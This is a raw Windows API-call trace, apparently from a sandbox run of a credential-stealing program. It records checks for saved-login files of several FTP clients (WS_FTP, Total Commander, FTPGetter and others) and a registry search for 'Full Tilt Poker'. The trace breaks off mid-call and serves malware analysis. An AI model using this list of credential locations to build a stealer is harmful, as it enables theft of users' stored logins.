[0114.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.475] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0114.476] GetProcessHeap () returned 0x5b0000 [0114.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.476] GetProcessHeap () returned 0x5b0000 [0114.476] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.476] GetProcessHeap () returned 0x5b0000 [0114.476] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.477] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.477] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.478] GetProcessHeap () returned 0x5b0000 [0114.478] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f82) returned 0x5cb930 [0114.478] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.479] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0114.479] GetProcessHeap () returned 0x5b0000 [0114.479] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5caae8 [0114.479] GetProcessHeap () returned 0x5b0000 [0114.480] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.481] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0114.481] GetProcessHeap () returned 0x5b0000 [0114.481] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.481] GetProcessHeap () returned 0x5b0000 [0114.482] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.482] GetProcessHeap () returned 0x5b0000 [0114.482] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f76) returned 0x5cb930 [0114.483] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.483] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0114.483] GetProcessHeap () returned 0x5b0000 [0114.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5c9390 [0114.483] GetProcessHeap () returned 0x5b0000 [0114.484] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.485] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0114.485] GetProcessHeap () returned 0x5b0000 [0114.485] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.486] GetProcessHeap () returned 0x5b0000 [0114.486] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.486] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.487] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.487] GetProcessHeap () returned 0x5b0000 [0114.487] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5cb930 [0114.487] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.490] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0114.490] GetProcessHeap () returned 0x5b0000 [0114.490] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5caae8 [0114.490] GetProcessHeap () returned 0x5b0000 [0114.490] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.491] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0114.491] GetProcessHeap () returned 0x5b0000 [0114.492] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.492] GetProcessHeap () returned 0x5b0000 [0114.492] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.492] GetProcessHeap () returned 0x5b0000 [0114.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.493] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.493] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Windows") returned 0x0 [0114.494] GetProcessHeap () returned 0x5b0000 [0114.494] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.494] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.495] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb98 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0114.495] GetProcessHeap () returned 0x5b0000 [0114.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x30) returned 0x5c64a8 [0114.495] GetProcessHeap () returned 0x5b0000 [0114.496] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.497] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0114.497] GetProcessHeap () returned 0x5b0000 [0114.497] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c64a8 | out: hHeap=0x5b0000) returned 1 [0114.497] GetProcessHeap () returned 0x5b0000 [0114.498] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.498] GetProcessHeap () returned 0x5b0000 [0114.498] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.498] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.499] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb8c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0114.499] GetProcessHeap () returned 0x5b0000 [0114.499] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x66) returned 0x5c9390 [0114.499] GetProcessHeap () returned 0x5b0000 [0114.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.501] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0114.501] GetProcessHeap () returned 0x5b0000 [0114.502] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.502] GetProcessHeap () returned 0x5b0000 [0114.502] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.503] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.503] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0114.503] GetProcessHeap () returned 0x5b0000 [0114.503] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5c) returned 0x5cb930 [0114.507] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.508] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\wcx_ftp.ini", arglist=0xdfb80 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0114.508] GetProcessHeap () returned 0x5b0000 [0114.508] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x46) returned 0x5c8f70 [0114.508] GetProcessHeap () returned 0x5b0000 [0114.508] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.509] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0114.509] GetProcessHeap () returned 0x5b0000 [0114.509] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8f70 | out: hHeap=0x5b0000) returned 1 [0114.510] GetProcessHeap () returned 0x5b0000 [0114.510] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.510] GetProcessHeap () returned 0x5b0000 [0114.510] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6c) returned 0x5cb930 [0114.510] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.511] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0xdfb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0114.511] GetProcessHeap () returned 0x5b0000 [0114.511] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x76) returned 0x5c6c10 [0114.511] GetProcessHeap () returned 0x5b0000 [0114.512] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.512] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0114.513] GetProcessHeap () returned 0x5b0000 [0114.513] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6c10 | out: hHeap=0x5b0000) returned 1 [0114.513] GetProcessHeap () returned 0x5b0000 [0114.513] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.514] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104 | out: pdwType=0x0, pvData=0x5cb930, pcbData=0xdfb74*=0x104) returned 0x2 [0114.514] GetProcessHeap () returned 0x5b0000 [0114.514] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.514] GetProcessHeap () returned 0x5b0000 [0114.514] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.515] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.515] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.515] GetProcessHeap () returned 0x5b0000 [0114.516] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.517] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0114.517] GetProcessHeap () returned 0x5b0000 [0114.517] GetProcessHeap () returned 0x5b0000 [0114.517] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.518] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0114.518] GetProcessHeap () returned 0x5b0000 [0114.518] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.518] GetProcessHeap () returned 0x5b0000 [0114.518] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.518] GetProcessHeap () returned 0x5b0000 [0114.519] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.519] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPGetter\\servers.xml", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0114.520] GetProcessHeap () returned 0x5b0000 [0114.520] GetProcessHeap () returned 0x5b0000 [0114.520] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.520] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0114.521] GetProcessHeap () returned 0x5b0000 [0114.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.521] GetProcessHeap () returned 0x5b0000 [0114.521] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.521] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.522] GetProcessHeap () returned 0x5b0000 [0114.522] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.523] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0xdfb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0114.523] GetProcessHeap () returned 0x5b0000 [0114.523] GetProcessHeap () returned 0x5b0000 [0114.523] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.523] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0114.524] GetProcessHeap () returned 0x5b0000 [0114.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.524] GetProcessHeap () returned 0x5b0000 [0114.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.524] GetProcessHeap () returned 0x5b0000 [0114.525] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Windows") returned 0x0 [0114.525] GetProcessHeap () returned 0x5b0000 [0114.526] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\WS_FTP.INI", arglist=0xdfb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0114.526] GetProcessHeap () returned 0x5b0000 [0114.526] GetProcessHeap () returned 0x5b0000 [0114.526] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.526] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0114.527] GetProcessHeap () returned 0x5b0000 [0114.527] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c69b0 | out: hHeap=0x5b0000) returned 1 [0114.527] GetProcessHeap () returned 0x5b0000 [0114.527] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.527] GetProcessHeap () returned 0x5b0000 [0114.528] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.528] GetProcessHeap () returned 0x5b0000 [0114.529] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Ipswitch", arglist=0xdfb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0114.529] GetProcessHeap () returned 0x5b0000 [0114.529] GetProcessHeap () returned 0x5b0000 [0114.529] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.529] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0114.529] GetProcessHeap () returned 0x5b0000 [0114.529] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.529] GetProcessHeap () returned 0x5b0000 [0114.529] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.529] GetProcessHeap () returned 0x5b0000 [0114.530] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0114.530] GetProcessHeap () returned 0x5b0000 [0114.531] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\site.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0114.531] GetProcessHeap () returned 0x5b0000 [0114.531] GetProcessHeap () returned 0x5b0000 [0114.531] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.532] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0114.532] GetProcessHeap () returned 0x5b0000 [0114.532] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc050 | out: hHeap=0x5b0000) returned 1 [0114.532] GetProcessHeap () returned 0x5b0000 [0114.532] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.545] GetProcessHeap () returned 0x5b0000 [0114.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0114.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.547] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x5ca8b0 | out: phkResult=0x5ca8b0*=0x1fc) returned 0x0 [0114.547] GetProcessHeap () returned 0x5b0000 [0114.547] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb930 [0114.547] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.548] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x0, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="AppDataLow", pcchName=0xdfb90) returned 0x0 [0114.548] GetProcessHeap () returned 0x5b0000 [0114.548] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0114.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.549] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="AppDataLow", phkResult=0x5caa60 | out: phkResult=0x5caa60*=0x1f0) returned 0x0 [0114.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.550] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0114.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.551] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.551] GetProcessHeap () returned 0x5b0000 [0114.551] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0114.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.552] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x1, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="IM Providers", pcchName=0xdfb90) returned 0x0 [0114.552] GetProcessHeap () returned 0x5b0000 [0114.552] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0114.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.553] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="IM Providers", phkResult=0x5ca940 | out: phkResult=0x5ca940*=0x1f0) returned 0x0 [0114.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.554] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0114.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.555] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.555] GetProcessHeap () returned 0x5b0000 [0114.555] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0114.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.556] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x2, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="Microsoft", pcchName=0xdfb90) returned 0x0 [0114.556] GetProcessHeap () returned 0x5b0000 [0114.556] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0114.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.557] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="Microsoft", phkResult=0x5caa40 | out: phkResult=0x5caa40*=0x1f0) returned 0x0 [0114.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.558] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0114.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.559] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.559] GetProcessHeap () returned 0x5b0000 [0114.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0114.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.560] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x3, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="Netscape", pcchName=0xdfb90) returned 0x0 [0114.560] GetProcessHeap () returned 0x5b0000 [0114.560] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8f0 [0114.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.561] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="Netscape", phkResult=0x5ca8f0 | out: phkResult=0x5ca8f0*=0x1f0) returned 0x0 [0114.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.562] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0114.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.563] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.563] GetProcessHeap () returned 0x5b0000 [0114.563] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8f0 | out: hHeap=0x5b0000) returned 1 [0114.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.564] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x4, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="ODBC", pcchName=0xdfb90) returned 0x0 [0114.564] GetProcessHeap () returned 0x5b0000 [0114.564] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9c0 [0114.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.565] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="ODBC", phkResult=0x5ca9c0 | out: phkResult=0x5ca9c0*=0x1f0) returned 0x0 [0114.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.566] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0114.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.567] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.567] GetProcessHeap () returned 0x5b0000 [0114.567] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9c0 | out: hHeap=0x5b0000) returned 1 [0114.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.568] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x5, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="Policies", pcchName=0xdfb90) returned 0x0 [0114.568] GetProcessHeap () returned 0x5b0000 [0114.568] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0114.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.569] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="Policies", phkResult=0x5ca940 | out: phkResult=0x5ca940*=0x1f0) returned 0x0 [0114.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.570] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0114.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.571] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.571] GetProcessHeap () returned 0x5b0000 [0114.571] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0114.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.572] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x6, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="RegisteredApplications", pcchName=0xdfb90) returned 0x0 [0114.572] GetProcessHeap () returned 0x5b0000 [0114.572] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0114.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.573] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="RegisteredApplications", phkResult=0x5ca970 | out: phkResult=0x5ca970*=0x1f0) returned 0x0 [0114.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.574] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0114.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.575] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.575] GetProcessHeap () returned 0x5b0000 [0114.575] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0114.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.576] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x7, pszName=0x5cb930, pcchName=0xdfb90 | out: pszName="Wow6432Node", pcchName=0xdfb90) returned 0x0 [0114.576] GetProcessHeap () returned 0x5b0000 [0114.576] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca980 [0114.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.577] RegOpenKeyW (in: hKey=0x1fc, lpSubKey="Wow6432Node", phkResult=0x5ca980 | out: phkResult=0x5ca980*=0x1f0) returned 0x0 [0114.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.578] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0114.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0114.579] RegCloseKey (hKey=0x1f0) returned 0x0 [0114.579] GetProcessHeap () returned 0x5b0000 [0114.579] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca980 | out: hHeap=0x5b0000) returned 1 [0114.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.580] SHEnumKeyExW (in: hkey=0x1fc, dwIndex=0x8, pszName=0x5cb930, pcchName=0xdfb90 | out: 